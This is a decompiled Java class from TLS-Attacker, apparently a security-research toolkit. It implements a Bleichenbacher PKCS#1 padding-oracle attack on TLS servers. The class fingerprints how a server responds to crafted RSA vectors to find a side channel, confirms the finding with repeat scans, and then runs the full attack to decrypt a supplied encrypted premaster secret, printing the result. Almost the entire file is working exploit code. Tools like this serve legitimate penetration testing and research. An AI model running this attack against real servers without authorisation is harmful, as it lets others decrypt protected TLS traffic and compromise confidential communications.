/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.impl;

import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.config.BleichenbacherCommandConfig;
import de.rub.nds.tlsattacker.attacks.exception.OracleUnstableException;
import de.rub.nds.tlsattacker.attacks.impl.Attacker;
import de.rub.nds.tlsattacker.attacks.impl.StateVectorPair;
import de.rub.nds.tlsattacker.attacks.padding.VectorResponse;
import de.rub.nds.tlsattacker.attacks.pkcs1.Bleichenbacher;
import de.rub.nds.tlsattacker.attacks.pkcs1.BleichenbacherVulnerabilityMap;
import de.rub.nds.tlsattacker.attacks.pkcs1.BleichenbacherWorkflowGenerator;
import de.rub.nds.tlsattacker.attacks.pkcs1.BleichenbacherWorkflowType;
import de.rub.nds.tlsattacker.attacks.pkcs1.Pkcs1Vector;
import de.rub.nds.tlsattacker.attacks.pkcs1.Pkcs1VectorGenerator;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.RealDirectMessagePkcs1Oracle;
import de.rub.nds.tlsattacker.attacks.util.response.EqualityError;
import de.rub.nds.tlsattacker.attacks.util.response.EqualityErrorTranslator;
import de.rub.nds.tlsattacker.attacks.util.response.FingerPrintChecker;
import de.rub.nds.tlsattacker.attacks.util.response.ResponseExtractor;
import de.rub.nds.tlsattacker.attacks.util.response.ResponseFingerprint;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.ProtocolVersion;
import de.rub.nds.tlsattacker.core.exceptions.ConfigurationException;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.util.CertificateFetcher;
import de.rub.nds.tlsattacker.core.workflow.ParallelExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.util.ConsoleLogger;
import java.io.IOException;
import java.math.BigInteger;
import java.security.interfaces.RSAPublicKey;
import java.util.LinkedList;
import java.util.List;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class BleichenbacherAttacker
extends Attacker<BleichenbacherCommandConfig> {
    private static final Logger LOGGER = LogManager.getLogger();
    private BleichenbacherWorkflowType vulnerableType;
    private EqualityError errorType;
    private boolean shakyScans = false;
    private final ParallelExecutor executor;
    private List<VectorResponse> fingerprintPairList;

    public BleichenbacherAttacker(BleichenbacherCommandConfig bleichenbacherConfig, Config baseConfig) {
        super(bleichenbacherConfig, baseConfig);
        this.executor = new ParallelExecutor(1, 3);
    }

    public BleichenbacherAttacker(BleichenbacherCommandConfig bleichenbacherConfig, Config baseConfig, ParallelExecutor executor) {
        super(bleichenbacherConfig, baseConfig);
        this.executor = executor;
    }

    public State executeTlsFlow(BleichenbacherWorkflowType type, byte[] encryptedPMS) {
        Config tlsConfig = this.getTlsConfig();
        WorkflowTrace trace = BleichenbacherWorkflowGenerator.generateWorkflow(tlsConfig, type, encryptedPMS);
        State state = new State(tlsConfig, trace);
        tlsConfig.setWorkflowExecutorShouldClose(false);
        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(tlsConfig.getWorkflowExecutorType(), state);
        workflowExecutor.executeWorkflow();
        return state;
    }

    @Override
    public Boolean isVulnerable() {
        this.errorType = this.getEqualityError();
        if (this.errorType != null && this.errorType != EqualityError.NONE) {
            this.vulnerableType = ((BleichenbacherCommandConfig)this.config).getWorkflowType();
            return true;
        }
        return false;
    }

    public EqualityError getEqualityError() {
        Config tlsConfig = this.getTlsConfig();
        RSAPublicKey publicKey = (RSAPublicKey)CertificateFetcher.fetchServerPublicKey(tlsConfig);
        if (publicKey == null) {
            LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?");
            return null;
        }
        LOGGER.info("Fetched the following server public key: " + publicKey);
        List<Pkcs1Vector> pkcs1Vectors = Pkcs1VectorGenerator.generatePkcs1Vectors(publicKey, ((BleichenbacherCommandConfig)this.config).getType(), tlsConfig.getDefaultHighestClientProtocolVersion());
        ConsoleLogger.CONSOLE.info("A server is considered vulnerable to this attack if it responds differently to the test vectors.");
        ConsoleLogger.CONSOLE.info("A server is considered secure if it always responds the same way.");
        LOGGER.debug("Testing: " + (Object)((Object)((BleichenbacherCommandConfig)this.config).getWorkflowType()));
        this.errorType = this.isVulnerable(pkcs1Vectors, publicKey);
        return this.errorType;
    }

    public EqualityError isVulnerable(List<Pkcs1Vector> pkcs1Vectors, RSAPublicKey publicKey) {
        this.fingerprintPairList = this.getBleichenbacherMap(((BleichenbacherCommandConfig)this.config).getWorkflowType(), pkcs1Vectors, publicKey);
        if (this.fingerprintPairList.isEmpty()) {
            LOGGER.warn("Could not extract Fingerprints");
            return null;
        }
        this.printBleichenbacherVectormap(this.fingerprintPairList);
        EqualityError error = this.getEqualityError(this.fingerprintPairList);
        if (error != EqualityError.NONE) {
            ConsoleLogger.CONSOLE.info("Found a side channel. Rescanning to confirm.");
            List<VectorResponse> secondBleichenbacherVectorMap = this.getBleichenbacherMap(((BleichenbacherCommandConfig)this.config).getWorkflowType(), pkcs1Vectors, publicKey);
            EqualityError error2 = this.getEqualityError(secondBleichenbacherVectorMap);
            BleichenbacherVulnerabilityMap mapOne = new BleichenbacherVulnerabilityMap(this.fingerprintPairList, error);
            BleichenbacherVulnerabilityMap mapTwo = new BleichenbacherVulnerabilityMap(secondBleichenbacherVectorMap, error2);
            if (mapOne.looksIdentical(mapTwo)) {
                EqualityError error3;
                List<VectorResponse> thirdBleichenbacherVectorMap = this.getBleichenbacherMap(((BleichenbacherCommandConfig)this.config).getWorkflowType(), pkcs1Vectors, publicKey);
                BleichenbacherVulnerabilityMap mapThree = new BleichenbacherVulnerabilityMap(thirdBleichenbacherVectorMap, error3 = this.getEqualityError(secondBleichenbacherVectorMap));
                if (!mapTwo.looksIdentical(mapThree)) {
                    LOGGER.debug("The third scan prove this vulnerability to be non existent");
                    this.shakyScans = true;
                    error = EqualityError.NONE;
                }
            } else {
                LOGGER.debug("The second scan prove this vulnerability to be non existent");
                this.shakyScans = true;
                error = EqualityError.NONE;
            }
        }
        if (error != EqualityError.NONE) {
            ConsoleLogger.CONSOLE.info("Found a vulnerability with " + ((BleichenbacherCommandConfig)this.config).getWorkflowType().getDescription());
        }
        return error;
    }

    public EqualityError getEqualityError(List<VectorResponse> bleichenbacherVectorMap) {
        ResponseFingerprint fingerprint = bleichenbacherVectorMap.get(0).getFingerprint();
        for (VectorResponse pair : bleichenbacherVectorMap) {
            EqualityError error = FingerPrintChecker.checkEquality(fingerprint, pair.getFingerprint());
            if (error == EqualityError.NONE) continue;
            ConsoleLogger.CONSOLE.info("Found an EqualityError!");
            ConsoleLogger.CONSOLE.info(EqualityErrorTranslator.translation(error, fingerprint, pair.getFingerprint()));
            return error;
        }
        return EqualityError.NONE;
    }

    private void printBleichenbacherVectormap(List<VectorResponse> bleichenbacherVectorMap) {
        LOGGER.debug("Vectormap:");
        LOGGER.debug("---------------");
        for (VectorResponse pair : bleichenbacherVectorMap) {
            LOGGER.debug((Object)pair);
        }
        LOGGER.debug("---------------");
    }

    private List<VectorResponse> getBleichenbacherMap(BleichenbacherWorkflowType bbWorkflowType, List<Pkcs1Vector> pkcs1Vectors, RSAPublicKey publicKey) {
        Config tlsConfig = this.getTlsConfig();
        tlsConfig.setWorkflowExecutorShouldClose(false);
        LinkedList<VectorResponse> bleichenbacherVectorMap = new LinkedList<VectorResponse>();
        LinkedList<State> stateList = new LinkedList<State>();
        LinkedList<StateVectorPair> stateVectorPairList = new LinkedList<StateVectorPair>();
        for (Pkcs1Vector pkcs1Vector : pkcs1Vectors) {
            WorkflowTrace trace = BleichenbacherWorkflowGenerator.generateWorkflow(tlsConfig, bbWorkflowType, pkcs1Vector.getEncryptedValue());
            State state = new State(tlsConfig, trace);
            stateList.add(state);
            stateVectorPairList.add(new StateVectorPair(state, pkcs1Vector));
        }
        this.executor.bulkExecuteStateTasks(stateList);
        for (StateVectorPair stateVectorPair : stateVectorPairList) {
            this.processFinishedStateVectorPair(stateVectorPair, bleichenbacherVectorMap);
        }
        for (StateVectorPair pair : stateVectorPairList) {
            if (pair.getState().getTlsContext().getServerRsaModulus() == null || pair.getState().getTlsContext().getServerRsaModulus().equals(publicKey.getModulus())) continue;
            throw new OracleUnstableException("Server sent us a different publickey during the scan. Aborting test");
        }
        return bleichenbacherVectorMap;
    }

    private void processFinishedStateVectorPair(StateVectorPair stateVectorPair, List<VectorResponse> bleichenbacherVectorMap) {
        if (stateVectorPair.getState().getWorkflowTrace().executedAsPlanned()) {
            ResponseFingerprint fingerprint = ResponseExtractor.getFingerprint(stateVectorPair.getState());
            bleichenbacherVectorMap.add(new VectorResponse(stateVectorPair.getVector(), fingerprint));
        } else {
            LOGGER.warn("Could not execute Workflow. Something went wrong... Check the debug output for more information");
        }
        this.clearConnections(stateVectorPair.getState());
    }

    private ResponseFingerprint getFingerprint(BleichenbacherWorkflowType type, byte[] encryptedPMS) {
        State state = this.executeTlsFlow(type, encryptedPMS);
        if (state.getWorkflowTrace().allActionsExecuted()) {
            ResponseFingerprint fingerprint = ResponseExtractor.getFingerprint(state);
            this.clearConnections(state);
            return fingerprint;
        }
        this.clearConnections(state);
        LOGGER.warn("Could not execute Workflow. Something went wrong... Check the debug output for more information");
        return null;
    }

    @Override
    public void executeAttack() {
        boolean vulnerable = this.isVulnerable();
        LOGGER.info("Using the following oracle type: {}", (Object)this.vulnerableType);
        if (!vulnerable) {
            LOGGER.warn("The server is not vulnerable to the Bleichenbacher attack");
            return;
        }
        Config tlsConfig = this.getTlsConfig();
        RSAPublicKey publicKey = (RSAPublicKey)CertificateFetcher.fetchServerPublicKey(tlsConfig);
        if (publicKey == null) {
            LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?");
            return;
        }
        if (((BleichenbacherCommandConfig)this.config).getEncryptedPremasterSecret() == null) {
            throw new ConfigurationException("You have to set the encrypted premaster secret you are going to decrypt");
        }
        LOGGER.info("Fetched the following server public key: " + publicKey);
        byte[] pms = ArrayConverter.hexStringToByteArray((String)((BleichenbacherCommandConfig)this.config).getEncryptedPremasterSecret());
        if (pms.length * 8 != publicKey.getModulus().bitLength()) {
            throw new ConfigurationException("The length of the encrypted premaster secret you have is not equal to the server public key length. Have you selected the correct value?");
        }
        RealDirectMessagePkcs1Oracle oracle = new RealDirectMessagePkcs1Oracle(publicKey, this.getTlsConfig(), this.extractValidFingerprint(publicKey, tlsConfig.getDefaultHighestClientProtocolVersion()), null, this.vulnerableType);
        Bleichenbacher attacker = new Bleichenbacher(pms, oracle, ((BleichenbacherCommandConfig)this.config).isMsgPkcsConform());
        attacker.attack();
        BigInteger solution = attacker.getSolution();
        ConsoleLogger.CONSOLE.info(solution.toString(16));
    }

    private ResponseFingerprint extractValidFingerprint(RSAPublicKey publicKey, ProtocolVersion version) {
        return this.getFingerprint(this.vulnerableType, Pkcs1VectorGenerator.generateCorrectPkcs1Vector(publicKey, version).getEncryptedValue());
    }

    public BleichenbacherWorkflowType getVulnerableType() {
        return this.vulnerableType;
    }

    private void clearConnections(State state) {
        try {
            state.getTlsContext().getTransportHandler().closeConnection();
        }
        catch (IOException ex) {
            LOGGER.debug((Object)ex);
        }
    }

    public EqualityError getErrorType() {
        return this.errorType;
    }

    public boolean isShakyScans() {
        return this.shakyScans;
    }

    public List<VectorResponse> getFingerprintPairList() {
        return this.fingerprintPairList;
    }
}

